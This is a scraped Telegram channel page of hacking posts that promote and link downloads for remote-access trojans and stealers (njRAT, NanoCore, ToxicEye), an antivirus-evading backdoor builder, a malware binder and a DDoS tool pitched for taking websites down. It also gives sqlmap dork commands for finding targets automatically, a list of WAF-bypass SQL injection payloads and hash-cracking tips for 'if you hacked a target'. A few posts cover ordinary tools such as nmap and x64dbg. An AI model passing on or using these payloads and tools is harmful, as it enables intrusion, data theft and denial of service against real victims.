BugCod3
7.26K subscribers
334 photos
6 videos
7 files
445 links
[ BugCod3 ] โ€” From Shadows To Shells โšก๏ธ

๐Ÿ•ถ Hacking | ๐Ÿž Bug Bounty | ๐Ÿ” Security Tools
โš”๏ธ Learn โ€ข Hunt โ€ข Dominate

๐Ÿ‘ฅ Group: T.me/BugCod3GP
๐Ÿ“‚ Topic: T.me/BugCod3Topic

๐ŸŒ Web: BugCod3.com
๐Ÿค– Contact: T.me/BugCod3BOT
๐Ÿ“ง Email: BugCod3@protonmail.com
Download Telegram
๐ŸŒŸ TheFatRat ๐ŸŒŸ

๐Ÿ”ฅ A Massive Exploiting Tool

๐Ÿ“ TheFatRat is an exploiting tool which compiles a malware with famous payload, and then the compiled maware can be executed on Linux , Windows , Mac and Android. TheFatRat Provides An Easy way to create Backdoors and Payload which can bypass most anti-virus.

๐Ÿ‘ Features !

๐Ÿ”ปFully Automating MSFvenom & Metasploit.
๐Ÿ”ปLocal or remote listener Generation.
๐Ÿ”ปEasily Make Backdoor by category Operating System.
๐Ÿ”ปGenerate payloads in Various formats.
๐Ÿ”ปBypass anti-virus backdoors.
๐Ÿ”ปFile pumper that you can use for increasing the size of your files.
๐Ÿ”ปThe ability to detect external IP & Interface address .
๐Ÿ”ปAutomatically creates AutoRun files for USB / CDROM exploitation

โ–ถ๏ธ Installation
Instructions on how to install TheFatRat
git clone https://github.com/Screetsec/TheFatRat.git
cd TheFatRat
chmod +x setup.sh && ./setup.sh


๐Ÿ˜ธ Github

#Trojan #Rat #Tools
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ข T.me/BugCod3
โค2๐Ÿ‘Ž2
๐‡๐จ๐ฐ ๐ญ๐จ ๐Ÿ๐ข๐ง๐ ๐š ๐ญ๐š๐ซ๐ ๐ž๐ญ
๐š๐ฎ๐ญ๐จ๐ฆ๐š๐ญ๐ข๐œ๐š๐ฅ๐ฅ๐ฒ?

โœจSQLMAPโœจ
๐Ÿ“SQLmap is an open-source tool used in penetration testing to detect and exploit SQL injection flaws. SQLmap automates the process of detecting and exploiting SQL injection. SQL Injection attacks can take control of databases that utilize SQL.

Installation
Github ๐Ÿ‘พ

๐ŸŽฏ ๐˜๐˜ฐ๐˜ธ ๐˜ต๐˜ฐ ๐˜ถ๐˜ด๐˜ฆ

To find the target automatically, you must use this command:
If you installed on sudo:sqlmap -g โ€œinurl:โ€.php?id=โ€intext:โ€Exampleโ€
if you installed on path:
sqlmap.py -g โ€œinurl:โ€.php?id=โ€intext:โ€Exampleโ€

โœ๏ธNote:you can add any dork in โ€œ

#Tools #dork
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ข T.me/BugCod3
๐Ÿ”ฅ2
MH Ddos-Dos TOOL

mh ddos-dos tool is one of the best and powerful ddos tools๐ŸŽƒ
with 56 methods one of the most powerful ddos tools
if you want do down any web site We suggest you to do it with several systems at the same time.

Installation๐Ÿ“
git clone https://github.com/MatrixTM/MHDDoS.git
cd MHDDoS
pip install -r requirements.txt


#ddos #dos
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ข T.me/BugCod3
๐Ÿ‘4๐ŸŽ‰2
๐ŸŒŸ Wifiphisher ๐ŸŒŸ

๐Ÿ“
Wifiphisher is a rogue Access Point framework for conducting red team engagements or Wi-Fi security testing.

โฌ‡๏ธ Download
๐Ÿˆโ€โฌ› Github

#WifiPhisher #RedTeam #Tools
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ข T.me/BugCod3
โคโ€๐Ÿ”ฅ4
5 important Tools that can use for Bug Hunting Journey or pen-testing process.

Information Gathering or Reconnisence is the most important part of penetration testing.

1:Nmap:Nmap is a free and open-source network mapping tool that can use for network discovery and security auditing
2: Amass:The OWASP Amass tool suite obtains subdomain names by scraping data sources, recursive brute forcing, crawling web archives, permuting/altering names, and reverse DNS sweeping.
3:Dirb:Dirb is a powerful web content scanner tool that can use to find hidden and existing files on the web application
4: Sublist3r:Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT.
5:DNS Recon:DNS Recon is a tool that can use for Domain Name System (DNS) enumeration.


#recon #osint
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ข T.me/BugCod3
โคโ€๐Ÿ”ฅ4๐ŸŽ‰2
๐ŸŒŸ njRAT ๐ŸŒŸ

๐Ÿ“
NjRAT is a Remote Administration Tool. This repository contains a Njrat Editions.

Use it on virtual machine

โฌ‡๏ธ Download (NjRat 0.7D Danger Edition)
โฌ‡๏ธ Download (NjRat 0.7D Golden Edition)
โฌ‡๏ธ Download (NjRat 0.7D Green Edition)
โฌ‡๏ธ Download (NjRat 0.7D)
โฌ‡๏ธ Download (njRAT Lime Edition )

โฌ‡๏ธ Download (ALL Version)
๐Ÿˆโ€โฌ› Github

#njRAT #Tools
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ข T.me/BugCod3
๐Ÿ‘3โšก1
Url Fuzzer

If you are bug hunter
You need to fuzz the url to find
Important directoryโ€™s this tool is one of the best url fuzz tools

๐Ÿ“Installation
curl -s "https://raw.githubusercontent.com/liamg/scout/master/scripts/install.sh" | bash


Github๐ŸŽƒ

#urlfuzzer #Tools
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ข T.me/BugCod3
๐Ÿญ NanoCore ๐Ÿญ

โš ๏ธ Use it on virtual machine โš ๏ธ

๐Ÿ“
is a Remote Access Trojan or RAT. This malware is highly customizable with plugins which allow attackers to tailor its functionality to their needs. Nanocore is created with the .NET framework

โฌ‡๏ธ Download

#Rat #Malware #Tools
โž—โž—โž—โž—โž—โž—โž—โž—โž—โž—โž—โž—
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ข T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โค2
๐ŸŒŸ Celesty Binder ๐ŸŒŸ

โš ๏ธ Use it on virtual machine โš ๏ธ

๐Ÿ“
Using this tool, you can insert malicious files into other files

โฌ‡๏ธ Download

#Binder #Tools
โž—โž—โž—โž—โž—โž—โž—โž—โž—โž—โž—โž—
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ข T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก5๐Ÿ‘2
๐ŸŒŸ Reverse Engineering and exploit development ๐ŸŒŸ

โฌ‡๏ธ Download

#Reverse #Engineering
โž—โž—โž—โž—โž—โž—โž—โž—โž—โž—โž—โž—
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ข T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก3๐Ÿ‘2
Google Dork๐Ÿฅท๐Ÿฝ

this site is one of the best web dork makers
that helps you in BUG BOUNTY

Usage๐Ÿ“
Enter domain of target then press Update domain,
then copy the generated Dorks.


Tool Link๐ŸŽƒ

#dork #google_dork
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ข T.me/BugCod3
โค3
๐Ÿ’€ ImHex ๐Ÿ’€

๐Ÿ’€ A Hex Editor for Reverse Engineers

โฌ‡๏ธ Download
๐Ÿ˜ธ Github

#Reverse #Engineering
โž—โž—โž—โž—โž—โž—โž—โž—โž—โž—โž—โž—
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ข T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก3โค1
โšก๏ธ Flash X โšก๏ธ

โš ๏ธ Use it on virtual machine โš ๏ธ

โฌ‡๏ธ Download

#Scanner
โž—โž—โž—โž—โž—โž—โž—โž—โž—โž—โž—โž—
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ข T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โค5โšก2๐Ÿ‘2
SQL Injection Bypass
โ€”โ€”โ€”โ€”โ€”โ€”โ€”โ€”โ€”
if your target have waf you should bypass that to access the database.

Lets start ๐Ÿฅท๐Ÿฝ

ORDER BY โ€”>
/*!50000Order*/by
/*!50000order*//*!50000by*/
/*!50000OrdeR*/By
/*!50000ORDER*//*!50000BY*/
/**A**/Order by
Order/**A**/By
/**/**/ORDER/**/BY/**/**/
Null' order by
O0x72der b0x7920

Union โ€”>
/*!50000union select
/*!50000Union*//*!50000Select*/
/*!12345union*//*!12345select*/
/**A**/union select
union /**A**/ select
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
+ #?1q %0AuNiOn all#qa%0A#%0AsEleCt
%23%0AUnion%23aaaaaaaaaa%0ASelect%23%0A1
+?UnI?On?+'SeL?ECT?

group_concat โ€”>
group_concat(/*!12345table_name*/)
/*!50000group_concat*/(/*!50000table_name*/)
unhex(hex(group_concat(table_name)))
unhex(hex(/*!12345group_concat*/(table_name)))
unhex(hex(/*!50000group_concat*/(/*!table_name*/)))

from table_name โ€”>
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
/*!50000frOm*/+/*!50000information_schema*/%252e/**/columns
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -


#sqli #sql_injection
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ข T.me/BugCod3
โค6โคโ€๐Ÿ”ฅ2๐Ÿ‘1
๐Ÿ”ซ PROXIES ๐Ÿ”ซ

๐Ÿ”ช20000x UHQ HTTP/S PROXIES

โฌ‡๏ธ Download

#Proxy
โž—โž—โž—โž—โž—โž—โž—โž—โž—โž—โž—โž—
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ข T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก2โค2
What is password hashing

About๐Ÿ“
Password hashing turns your password (or any other piece of data) into a short string of letters and/or numbers using an encryption algorithm. If a website is hacked, password hashing helps prevent cybercriminals from getting access to your passwords.

So if you hacked a target and get them user,pass as a hash

So how do we crack these hashes
๐Ÿฅท

Open the link in below and then add your hash in input form then click im not robot and the click crack hash


Noteโš ๏ธ
This site have 17billion words
Some times it cant crack all the hashes but maybe on future all hashes gone crack.

Web Link๐Ÿ‘พ

#hash #crack
โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ข T.me/BugCod3
๐Ÿ‘3โšก2๐Ÿ”ฅ2
๐Ÿ˜ˆ SQL ๐Ÿ˜ˆ

๐Ÿ‘ผ Dios Bypass Waf ๐Ÿ‘ผ

โฌ‡๏ธ Download

๐Ÿ”’
 BugCod3


#SQL #Dios #Bypass #Waf #POC
โž—โž—โž—โž—โž—โž—โž—โž—โž—โž—โž—โž—
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ข T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก2โค1๐Ÿ‘1
๐Ÿ‘ ToxicEye ๐Ÿ‘
โž– RAT + STEALER + CLIPPER โž–

๐Ÿ–ฑ Program for remote control of windows computers via telegram bot. Written in C#

๐Ÿ’Ž Functions:
๐Ÿ”ต ComputerInfo
๐Ÿ”ต BatteryInfo
๐Ÿ”ต Location
๐Ÿ”ต Whois
๐Ÿ”ต ActiveWindow
๐Ÿ”ต Webcam
๐Ÿ”ต Microphone
๐Ÿ”ต Desktop
๐Ÿ”ต Keylogger
๐Ÿ”ต ClipboardSet
๐Ÿ”ต ClipboardGet
๐Ÿ”ต GetDiscord
๐Ÿ”ต GetTelegram
๐Ÿ”ต GetSteam
๐Ÿ”ต DownloadFile
๐Ÿ”ต UploadFile
๐Ÿ”ต RunFile
๐Ÿ”ต RunFileAdmin
๐Ÿ”ต Shell
๐Ÿ”ต EncryptFileSystem
๐Ÿ”ต DecryptFileSystemForkBomb
๐Ÿ”ต And ...

โฌ‡๏ธ Download
๐Ÿ˜ธ Github

๐Ÿ”’
BugCod3


#Rat #Malware
โž—โž—โž—โž—โž—โž—โž—โž—โž—โž—โž—โž—
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ข T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โšก3โค1
๐Ÿชฒ x64dbg ๐Ÿชฒ

๐Ÿ“
An open-source binary debugger for Windows, aimed at malware analysis and reverse engineering of executables you do not have the source code for. There are many features available and a comprehensive plugin system to add your own.

โฌ‡๏ธ Download
๐Ÿ˜ธ Github

๐Ÿ”’
BugCod3


#Debugger #Reverse_Engineering #Program_Analysis
โž—โž—โž—โž—โž—โž—โž—โž—โž—โž—โž—โž—
๐Ÿ‘ค T.me/BugCod3BOT
๐Ÿ“ข T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
โค2โšก2
Happy your Yalda Night ๐Ÿ‰๐ŸŒน
Please open Telegram to view this post
VIEW IN TELEGRAM
โคโ€๐Ÿ”ฅ3โค3